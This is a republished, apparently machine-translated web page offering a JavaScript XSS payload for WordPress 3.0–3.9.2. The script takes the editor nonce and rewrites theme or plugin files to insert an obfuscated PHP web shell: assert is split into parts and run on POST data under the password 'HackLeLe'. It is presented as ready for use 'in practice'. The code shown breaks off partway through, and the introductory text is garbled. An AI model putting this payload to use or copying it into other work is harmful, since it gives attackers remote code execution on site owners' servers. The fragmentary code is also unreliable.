Wordpress 3.0-3.9.2 XSS Getshell Payload (you can use the current Getshell template or all plug-in templates)

Source: Internet
Author: User

Wordpress 3.0-3.9.2 XSS Getshell Payload (you can use the current Getshell template or all plug-in templates)

If it is used in practice, remember to send the line "console. lnfo...
Password: HackLeLe
This getshell js has the functions of the current getshell template and all the getshell templates.
The default value is getshell. The current template StartGetshell = 0.
If you want to change the value of StartGetshell to 1 in all the getshell plug-in templates

/*HackLeLe WordPress Getshell*/var a = location.href.split('/');var file = "";var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");var file2 = [];var StartGetshell = 0;var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["HackLeLe"]);';jQuery.ajax({  url: xurl,  type: 'GET',  dataType: 'html',  data: {},}).done(function(data) {  var temp = jQuery(data);  var Xtoken = "";  var Tmpcode = "";  temp.find('input#_wpnonce').each(function(i,o){    var o=jQuery(o);    Xtoken=o.attr('value');  });  temp.find('textarea#newcontent').each(function(i,o){    var o=jQuery(o);    Tmpcode = o.text().replace('<?php',shellcode);      })  temp.find('div.alignleft big strong').each(function(i,o){    var o=jQuery(o);    file = o.text();  })

 




Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.